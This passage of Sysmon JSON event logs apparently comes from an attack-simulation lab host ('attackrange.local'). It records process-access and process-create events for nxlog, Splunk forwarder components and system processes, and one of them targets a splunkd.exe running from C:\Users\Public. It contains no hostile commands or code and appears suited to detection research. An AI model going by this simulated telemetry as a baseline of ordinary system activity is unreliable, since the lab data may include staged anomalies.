(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:53.532","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:54.532\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:54.532","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:55.533\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:55.533","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.533\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.533","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.596\r\nProcessGuid: {E2A3D6B1-11FC-5F25-0000-0010DE170900}\r\nProcessId: 5036\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.596","ProcessGuid":"{E2A3D6B1-11FC-5F25-0000-0010DE170900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11FC-5F25-0000-0010DE170900}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11FC-5F25-0000-0010DE170900}","TargetProcessId":"5036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11FC-5F25-0000-0010DE170900}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11FC-5F25-0000-0010DE170900}","TargetProcessId":"5036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:56.595\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:56.595","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\